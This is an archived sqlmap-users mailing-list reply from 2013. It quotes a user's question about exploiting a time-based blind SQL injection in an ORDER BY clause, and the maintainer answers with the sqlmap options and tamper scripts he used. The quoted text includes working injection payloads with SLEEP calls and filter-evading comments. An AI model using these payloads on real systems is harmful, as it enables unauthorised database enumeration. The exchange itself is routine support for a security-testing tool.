Re: [sqlmap-users] exp blind
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] exp blind
|
From: Miroslav S. <mir...@gm...> - 2013-02-21 17:18:46
|
Hi. You haven't told anything that could help. Neither switches/options used, neither tamper scripts used, nothing. You are using some custom tamper script(s) as I can see "/*!50000" in payload (we don't have this in our tamper scripts). Nevertheless, I've tried to reproduce your run with --technique=T --tamper="between,versionedmorekeywords,ifnull2ifisnull" --dbs against our testing environment and everything works out of box. Kind regards, Miroslav Stampar On Thu, Feb 21, 2013 at 5:22 PM, Кирилл Бельков <li...@gm...> wrote: > Hello, all. > > I'm trying to exploit the blind injection in the following query: > > $var = $_GET['var']; > SELECT id,name FROM people ORDER BY $var > > sqlmap find vulnerabilities, but can not be used. > > sqmap sends the following query: > > name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/ > IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS > CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS > CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND > 1),SLEEP(5),561) > > [22:20:36] [ERROR] unable to retrieve the number of databases > > but it does not work. May interfere with some kind of filter. > > But my request in browser url: > > index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM > /*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN > sleep(10) ELSE date END > > It takes a successful ... How can I get sqlmap use my method of attack from > the one it uses by default. > > Sincerely, Kirill > > p.s. sorry for my bad english > > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_feb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
